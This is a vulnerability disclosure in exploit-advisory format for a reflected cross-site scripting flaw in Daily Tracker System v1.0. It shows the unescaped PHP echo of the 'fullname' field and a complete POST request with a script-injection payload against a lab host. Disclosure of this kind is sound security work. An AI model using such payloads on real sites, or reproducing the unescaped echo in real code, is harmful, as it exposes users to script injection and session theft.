Daily Tracker System 1.0 Cross Site Scripting

`# Exploit Title: Daily Tracker System v1.0 - Reflected Cross Site Scripting  
(XSS)  
# Exploit Author: Adeeb Shah  
# Date: July 30th, 2020  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link:  
https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL  
# Version: v1.0  
# Tested On: Windows 10 Pro (x64) + XAMPP  
  
# Vulnerability Details:  
# The value of the fullname request parameter is copied into the value of  
an HTML tag attribute which is encapsulated in double quotation marks. The  
payload rwsg6"><script>alert(1)</script>x88n2 was submitted in the fullname  
parameter. This input was echoed unmodified in the application's response.  
This proof-of-concept attack demonstrates that it is possible to inject  
arbitrary JavaScript into the application's response.  
  
# Vulnerable Source Code  
# ./user-profile.php  
# 11 $fullname=$_POST['fullname'];  
# ./includes/sidebar.php  
# 21 <div class="profile-usertitle-name"><?php echo $name;  
?></div>  
# POST /dets/user-profile.php HTTP/1.1  
  
Host: 172.16.65.130  
Accept-Encoding: gzip, deflate  
Accept: /  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Referer: http://172.16.65.130/dets/user-profile.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 141  
Cookie: PHPSESSID=atvmfd664osgggvtcoc4scv9vs  
  
fullname=qdgxv9ny5y7prycziwy4tx92gz950m2ij88rwsg6%22%3e%3cscript%3ealert(1)%3c%2fscript%3ex88n2&email=  
[email protected]  
&contactnumber=289607&regdate=2020-07-29+20%3a04%3a07&submit=  
`